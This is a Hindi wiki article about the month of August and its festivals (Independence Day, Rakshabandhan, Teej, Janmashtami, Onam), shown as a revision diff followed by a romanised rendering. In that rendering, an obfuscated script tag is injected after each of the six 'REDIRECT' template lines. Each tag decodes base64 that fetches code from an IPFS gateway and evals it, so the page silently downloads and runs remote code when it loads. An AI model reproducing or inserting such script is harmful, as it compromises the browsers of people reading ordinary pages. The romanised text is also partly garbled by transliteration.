Difference between revisions of "अगस्त"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Adding category Category:अगस्त (को हटा दिया गया हैं।))
 
(2 intermediate revisions by the same user not shown)
Line 7: Line 7:
 
|हिजरी माह=[[शव्वाल]] - [[ज़िलक़ाद]]
 
|हिजरी माह=[[शव्वाल]] - [[ज़िलक़ाद]]
 
|कुल दिन=31
 
|कुल दिन=31
|व्रत एवं त्योहार=[[रक्षाबन्धन]], [[कृष्ण जन्माष्टमी]], [[हरियाली तीज]], [[ओणम]]
+
|व्रत एवं त्योहार=[[रक्षाबन्धन]] ([[श्रावण]] [[पूर्णिमा]]), [[हरियाली तीज]] ([[श्रावण]] [[शुक्ल पक्ष]] [[पंचमी]]), [[कृष्ण जन्माष्टमी]] ([[भाद्रपद]] [[कृष्ण पक्ष]] [[अष्टमी]]), [[ओणम]]
 
|जयंती एवं मेले= नेहरू ट्रॉफ़ी नौका दौड़ ([[केरल]] में)
 
|जयंती एवं मेले= नेहरू ट्रॉफ़ी नौका दौड़ ([[केरल]] में)
 
|महत्त्वपूर्ण दिवस=[[विश्व स्तनपान दिवस|विश्व स्तनपान सप्ताह]] (पहला सप्ताह),  [[भारतीय क्रांति दिवस]] (09), [[अंतरराष्ट्रीय युवा दिवस]] (12), [[स्वतंत्रता दिवस]] (15)
 
|महत्त्वपूर्ण दिवस=[[विश्व स्तनपान दिवस|विश्व स्तनपान सप्ताह]] (पहला सप्ताह),  [[भारतीय क्रांति दिवस]] (09), [[अंतरराष्ट्रीय युवा दिवस]] (12), [[स्वतंत्रता दिवस]] (15)
Line 19: Line 19:
 
|अन्य जानकारी=अगस्त [[वर्ष]] के उन सात महीनों में से एक है जिनके [[दिन|दिनों]] की संख्या 31 होती है।
 
|अन्य जानकारी=अगस्त [[वर्ष]] के उन सात महीनों में से एक है जिनके [[दिन|दिनों]] की संख्या 31 होती है।
 
|बाहरी कड़ियाँ=
 
|बाहरी कड़ियाँ=
|अद्यतन={{अद्यतन|16:39, 9 जून 2013 (IST)}}
+
|अद्यतन=
 
}}
 
}}
'''अगस्त ''' ([[अंग्रेज़ी]]: ''August'')  [[ग्रेगोरी कैलंडर]] के अनुसार [[वर्ष]] का आठवाँ [[माह|महीना]] है। यह वर्ष के उन सात महीनों में से एक है जिनके [[दिन|दिनों]] की संख्या 31 होती है। ग्रेगोरी कैलंडर, दुनिया में लगभग हर जगह उपयोग किया जाने वाला कालदर्शक (कैलंडर) या तिथिपत्रक है। यह [[जूलियन कलॅण्डर|जूलियन कालदर्शक]] का रूपातंरण है। ग्रेगोरी कालदर्शक की मूल इकाई [[दिन]] होता है। 365 दिनों का एक वर्ष होता है, किन्तु हर चौथा वर्ष 366 दिन का होता है जिसे [[अधिवर्ष]] (लीप का साल) कहते हैं। [[सूर्य]] पर आधारित [[पंचांग]] हर 146,097 दिनों बाद दोहराया जाता है। इसे 400 वर्षों मे बाँटा गया है, और यह 20871 [[सप्ताह]] (7 दिनों) के बराबर होता है। इन 400 वर्षों में 303 वर्ष आम वर्ष होते हैं, जिनमें 365 दिन होते हैं। और 97 लीप वर्ष होते हैं, जिनमें 366 दिन होते हैं। इस प्रकार हर वर्ष में 365 दिन, 5 घंटे, 49 मिनट और 12 सेकंड होते है। इसे पोप ग्रेगोरी ने लागू किया था।[[चित्र:Parade-On-Motor-Cycle.JPG|thumb|left|[[स्वतंत्रता दिवस]]]]
+
'''अगस्त''' ([[अंग्रेज़ी]]: ''August'')  [[ग्रेगोरी कैलंडर]] के अनुसार [[वर्ष]] का आठवाँ [[माह|महीना]] है। यह वर्ष के उन सात महीनों में से एक है जिनके [[दिन|दिनों]] की संख्या 31 होती है। ग्रेगोरी कैलंडर, दुनिया में लगभग हर जगह उपयोग किया जाने वाला कालदर्शक (कैलंडर) या तिथिपत्रक है। यह [[जूलियन कलॅण्डर|जूलियन कालदर्शक]] का रूपातंरण है। ग्रेगोरी कालदर्शक की मूल इकाई [[दिन]] होता है। 365 दिनों का एक वर्ष होता है, किन्तु हर चौथा वर्ष 366 दिन का होता है जिसे [[अधिवर्ष]] (लीप का साल) कहते हैं। [[सूर्य]] पर आधारित [[पंचांग]] हर 146,097 दिनों बाद दोहराया जाता है। इसे 400 वर्षों मे बाँटा गया है, और यह 20871 [[सप्ताह]] (7 दिनों) के बराबर होता है। इन 400 वर्षों में 303 वर्ष आम वर्ष होते हैं, जिनमें 365 दिन होते हैं। और 97 लीप वर्ष होते हैं, जिनमें 366 दिन होते हैं। इस प्रकार हर वर्ष में 365 दिन, 5 घंटे, 49 मिनट और 12 सेकंड होते है। इसे पोप ग्रेगोरी ने लागू किया था।
 +
[[चित्र:Parade-On-Motor-Cycle.JPG|thumb|left|[[स्वतंत्रता दिवस]]]]
 
==अगस्त के पर्व एवं त्योहार==
 
==अगस्त के पर्व एवं त्योहार==
 +
निम्नलिखित पर्व एवं त्योहार ([[रक्षाबंधन]], [[कृष्ण जन्माष्टमी]], [[नागपंचमी]], [[हरियाली तीज]]) अधिकांशत अगस्त माह में पड़ते हैं। स्मरणीय तथ्य यह है कि [[हिन्दू|हिन्दुओं]] के पर्व एवं त्योहारों का संबंध  [[ग्रेगोरी कैलंडर]] से न होकर [[विक्रम संवत]] से होता है।
 
====स्वतंत्रता दिवस====  
 
====स्वतंत्रता दिवस====  
 
{{Main|स्वतंत्रता दिवस}}
 
{{Main|स्वतंत्रता दिवस}}
 
[[भारत]] की आज़ादी की याद में स्वतंत्रता दिवस का आयोजन किया जाता हैं। [[15 अगस्त]] को भारत की राजधानी [[दिल्ली]] में झंडा आरोहण और सांस्कृतिक कार्यक्रम मुख्य आकर्षण होते हैं। सबसे प्रमुख कार्यक्रम होता हैं [[लाल क़िला दिल्ली|लाल किले]] से [[भारत के प्रधानमंत्री]] का भाषण। प्रदेशों की राजधानियों और प्रशासकीय तंत्रों में भी विशेष कार्यक्रम आयोजित किए जाते हैं।
 
[[भारत]] की आज़ादी की याद में स्वतंत्रता दिवस का आयोजन किया जाता हैं। [[15 अगस्त]] को भारत की राजधानी [[दिल्ली]] में झंडा आरोहण और सांस्कृतिक कार्यक्रम मुख्य आकर्षण होते हैं। सबसे प्रमुख कार्यक्रम होता हैं [[लाल क़िला दिल्ली|लाल किले]] से [[भारत के प्रधानमंत्री]] का भाषण। प्रदेशों की राजधानियों और प्रशासकीय तंत्रों में भी विशेष कार्यक्रम आयोजित किए जाते हैं।
 
 
====रक्षाबन्धन====
 
====रक्षाबन्धन====
 
{{Main|रक्षाबन्धन}}
 
{{Main|रक्षाबन्धन}}
Line 34: Line 35:
 
{{Main|नागपंचमी}}
 
{{Main|नागपंचमी}}
 
यह पर्व [[पश्चिम बंगाल]], [[महाराष्ट्र]] और [[दक्षिण भारत]] में मनाया जाता हैं। [[साँप|साँपों]] की पूजा और उनके प्रति श्रद्धा प्रदर्शित करना इस पर्व का प्रमुख उद्देश्य है।[[चित्र:Krishna-birth2.jpg|thumb|left|[[कृष्ण जन्माष्टमी]]]]
 
यह पर्व [[पश्चिम बंगाल]], [[महाराष्ट्र]] और [[दक्षिण भारत]] में मनाया जाता हैं। [[साँप|साँपों]] की पूजा और उनके प्रति श्रद्धा प्रदर्शित करना इस पर्व का प्रमुख उद्देश्य है।[[चित्र:Krishna-birth2.jpg|thumb|left|[[कृष्ण जन्माष्टमी]]]]
====कृष्ण जन्माष्टमी====
 
{{Main|कृष्ण जन्माष्टमी}}
 
[[श्रीकृष्ण|श्री कृष्ण]] का जन्मदिन सम्पूर्ण [[भारत]] में बड़े उत्सव के साथ मनाया जाता है। [[मथुरा]] और [[वृन्दावन]] में जहाँ श्रीकृष्ण ने अपना बचपन बिताया, जन्माष्टमी की बड़ी धूम देखने योग्य होती है। उनके जीवन की घटनाओं को झाँकियों में प्रदर्शित किया जाता है और [[कृष्णलीला]] नाटक के रूप में भी खेली जाती है। महाराष्ट्र में ऊँचाई पर दही की हाँडी को लटका दिया जाता है और नवयुवकों की टोलियाँ पिरामिड बना कर उसको तोड़ने की कोशिश करते हैं।
 
  
 
====हरियाली तीज====
 
====हरियाली तीज====
Line 42: Line 40:
 
{{Main|हरियाली तीज}}
 
{{Main|हरियाली तीज}}
 
[[श्रावण]] मास के [[शुक्ल पक्ष]] की [[तृतीया]] को हरियाली तीज मनाते हैं। [[वर्षा ऋतु]] के स्वागत में [[राजस्थान]] और [[पंजाब]] में तीज नाम का झूला उत्सव मनाया जाता है। पेड़ों पर झूले डाल दिए जाते हैं और उन्हें फूलों से सजाया जाता है महिलाएँ वस्त्रों और आभूषणों से सुसज्जित होकर झूला झूलती हैं और [[सावन]] के गीत गाती है।
 
[[श्रावण]] मास के [[शुक्ल पक्ष]] की [[तृतीया]] को हरियाली तीज मनाते हैं। [[वर्षा ऋतु]] के स्वागत में [[राजस्थान]] और [[पंजाब]] में तीज नाम का झूला उत्सव मनाया जाता है। पेड़ों पर झूले डाल दिए जाते हैं और उन्हें फूलों से सजाया जाता है महिलाएँ वस्त्रों और आभूषणों से सुसज्जित होकर झूला झूलती हैं और [[सावन]] के गीत गाती है।
 
+
====कृष्ण जन्माष्टमी====
 +
{{Main|कृष्ण जन्माष्टमी}}
 +
[[श्रीकृष्ण|श्री कृष्ण]] का जन्मदिन सम्पूर्ण [[भारत]] में बड़े उत्सव के साथ मनाया जाता है। [[मथुरा]] और [[वृन्दावन]] में जहाँ श्रीकृष्ण ने अपना बचपन बिताया, जन्माष्टमी की बड़ी धूम देखने योग्य होती है। उनके जीवन की घटनाओं को झाँकियों में प्रदर्शित किया जाता है और [[कृष्णलीला]] नाटक के रूप में भी खेली जाती है। महाराष्ट्र में ऊँचाई पर दही की हाँडी को लटका दिया जाता है और नवयुवकों की टोलियाँ पिरामिड बना कर उसको तोड़ने की कोशिश करते हैं।
 
====ओणम (केरल)====
 
====ओणम (केरल)====
 
{{Main|ओणम}}
 
{{Main|ओणम}}
ओणम, [[केरल]] का एक प्रमुख त्यौहार है। ओणम को मलयाली कैलेण्डर कोलावर्षम के पहले महीने 'छिंगम' यानी अगस्त-[[सितंबर]] के बीच मनाने की परंपरा चली आ रही है। प्राचीन [[बलि|राजा महाबली]] के सम्मान में यह पर्व मनाया जाता है। साथ ही साथ नयी फसल का उत्साह भी लोगों में होता हैं। दस दिन के इस रंगारंग त्योहार में बैलों को सजाया जाता है, फूलों की रंगोली बनाई जाती है। घरों में रंग रोगन होता है, नए कपड़े पहने जाते हैं, खाना पीना होता है और महाबली के सम्पन्न राज्य की प्रशंसा में गीत गाए जाते हैं। इस पर्व का प्रमुख आकर्षण सर्पनौकाओं की दौड़ प्रतियोगिता है जो चम्पाकुलम, अरणमुला और कोट्टयम के समुद्री पानी में होती हैं।
+
ओणम, [[केरल]] का एक प्रमुख त्यौहार है। ओणम को मलयाली कैलेण्डर कोलावर्षम के पहले महीने 'छिंगम' यानी अगस्त-[[सितंबर]] के बीच मनाने की परंपरा चली आ रही है। प्राचीन [[बलि|राजा महाबली]] के सम्मान में यह पर्व मनाया जाता है। साथ ही साथ नयी फसल का उत्साह भी लोगों में होता हैं। दस दिन के इस रंगारंग त्योहार में बैलों को सजाया जाता है, फूलों की रंगोली बनाई जाती है। घरों में रंग रोगन होता है, नए कपड़े पहने जाते हैं, खाना पीना होता है और महाबली के सम्पन्न राज्य की प्रशंसा में गीत गाए जाते हैं। इस पर्व का प्रमुख आकर्षण सर्प नौकाओं की दौड़ प्रतियोगिता है जो चम्पाकुलम, अरणमुला और कोट्टयम के समुद्री पानी में होती हैं।
  
 
====नेहरू ट्रॉफ़ी नौका दौड़ (केरल)====
 
====नेहरू ट्रॉफ़ी नौका दौड़ (केरल)====

Latest revision as of 12:21, 21 February 2016

agast
vivaran gregori kailandar ke anusar varsh ka athavaan mahina hai.
hiandi mah shravan - bhadrapad
hijari mah shavval - zilaqad
kul din 31
vrat evan tyohar rakshabandhan (shravan poornima), hariyali tij (shravan shukl paksh panchami), krishna janmashtami (bhadrapad krishna paksh ashtami), onam
jayanti evan mele neharoo tr aaufi nauka dau d (keral mean)
mahattvapoorn divas vishv stanapan saptah (pahala saptah), bharatiy kraanti divas (09), aantararashtriy yuva divas (12), svatantrata divas (15)
pichhala julaee
agala sitambar
any janakari agast varsh ke un sat mahinoan mean se ek hai jinake dinoan ki sankhya 31 hoti hai.

agast (aangrezi: August) gregori kailandar ke anusar varsh ka athavaan mahina hai. yah varsh ke un sat mahinoan mean se ek hai jinake dinoan ki sankhya 31 hoti hai. gregori kailandar, duniya mean lagabhag har jagah upayog kiya jane vala kaladarshak (kailandar) ya tithipatrak hai. yah jooliyan kaladarshak ka roopatanran hai. gregori kaladarshak ki mool ikaee din hota hai. 365 dinoan ka ek varsh hota hai, kintu har chautha varsh 366 din ka hota hai jise adhivarsh (lip ka sal) kahate haian. soory par adharit panchaang har 146,097 dinoan bad doharaya jata hai. ise 400 varshoan me baanta gaya hai, aur yah 20871 saptah (7 dinoan) ke barabar hota hai. in 400 varshoan mean 303 varsh am varsh hote haian, jinamean 365 din hote haian. aur 97 lip varsh hote haian, jinamean 366 din hote haian. is prakar har varsh mean 365 din, 5 ghante, 49 minat aur 12 sekand hote hai. ise pop gregori ne lagoo kiya tha. [[chitr:Parade-On-Motor-Cycle.JPG|thumb|left|svatantrata divas]]

agast ke parv evan tyohar

nimnalikhit parv evan tyohar (rakshabandhan, krishna janmashtami, nagapanchami, hariyali tij) adhikaanshat agast mah mean p date haian. smaraniy tathy yah hai ki hinduoan ke parv evan tyoharoan ka sanbandh gregori kailandar se n hokar vikram sanvat se hota hai.

svatantrata divas

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

bharat ki azadi ki yad mean svatantrata divas ka ayojan kiya jata haian. 15 agast ko bharat ki rajadhani dilli mean jhanda arohan aur saanskritik karyakram mukhy akarshan hote haian. sabase pramukh karyakram hota haian lal kile se bharat ke pradhanamantri ka bhashan. pradeshoan ki rajadhaniyoan aur prashasakiy tantroan mean bhi vishesh karyakram ayojit kie jate haian.

rakshabandhan

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

rakshabandhan ke avasar par bahan apane ghanisht prem ke pratik reshami dhage 'rakhi' ko bhaee ki kalaee par baandhati haian aur badale mean bhaee use upahar deta hai. yah tyohar bhaee bahan ke bich paraspar sahayog aur raksha ki bhavana ko sudridh karata hai. yah poore uttar bharat mean prachalit hai.

nagapanchami

[[chitr:Raksha-Bandhan.jpg|thumb|rakshabandhan]]

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

yah parv pashchim bangal, maharashtr aur dakshin bharat mean manaya jata haian. saanpoan ki pooja aur unake prati shraddha pradarshit karana is parv ka pramukh uddeshy hai.[[chitr:Krishna-birth2.jpg|thumb|left|krishna janmashtami]]

hariyali tij

[[chitr:Hariyali-Teej2.jpg|thumb|hariyali tij]]

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

shravan mas ke shukl paksh ki tritiya ko hariyali tij manate haian. varsha rritu ke svagat mean rajasthan aur panjab mean tij nam ka jhoola utsav manaya jata hai. pe doan par jhoole dal die jate haian aur unhean phooloan se sajaya jata hai mahilaean vastroan aur abhooshanoan se susajjit hokar jhoola jhoolati haian aur savan ke git gati hai.

krishna janmashtami

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

shri krishna ka janmadin sampoorn bharat mean b de utsav ke sath manaya jata hai. mathura aur vrindavan mean jahaan shrikrishna ne apana bachapan bitaya, janmashtami ki b di dhoom dekhane yogy hoti hai. unake jivan ki ghatanaoan ko jhaankiyoan mean pradarshit kiya jata hai aur krishnalila natak ke roop mean bhi kheli jati hai. maharashtr mean ooanchaee par dahi ki haandi ko lataka diya jata hai aur navayuvakoan ki toliyaan piramid bana kar usako to dane ki koshish karate haian.

onam (keral)

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

onam, keral ka ek pramukh tyauhar hai. onam ko malayali kailendar kolavarsham ke pahale mahine 'chhiangam' yani agast-sitanbar ke bich manane ki paranpara chali a rahi hai. prachin raja mahabali ke samman mean yah parv manaya jata hai. sath hi sath nayi phasal ka utsah bhi logoan mean hota haian. das din ke is rangarang tyohar mean bailoan ko sajaya jata hai, phooloan ki rangoli banaee jati hai. gharoan mean rang rogan hota hai, ne kap de pahane jate haian, khana pina hota hai aur mahabali ke sampann rajy ki prashansa mean git gae jate haian. is parv ka pramukh akarshan sarp naukaoan ki dau d pratiyogita hai jo champakulam, aranamula aur kottayam ke samudri pani mean hoti haian.

neharoo tr aaufi nauka dau d (keral)

keral ka alapuja nagar apani varshik naukadau d ke lie prasiddh haian. yah dau d agast mah ke doosare shanivar ko hoti hai. is lanbi dau d mean akarshan sarp naukae bhag leti haian jinhean sau se bhi adhik log ek sath khete haian. vijeta ko vijay chihn pradan kiya jata haian. is dau d ka anand lene log vishv ke har kone se yahaan ate haian.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. agast mah ke parv (hiandi) abhivyakti. abhigaman tithi: 9 joon, 2013.

sanbandhit lekh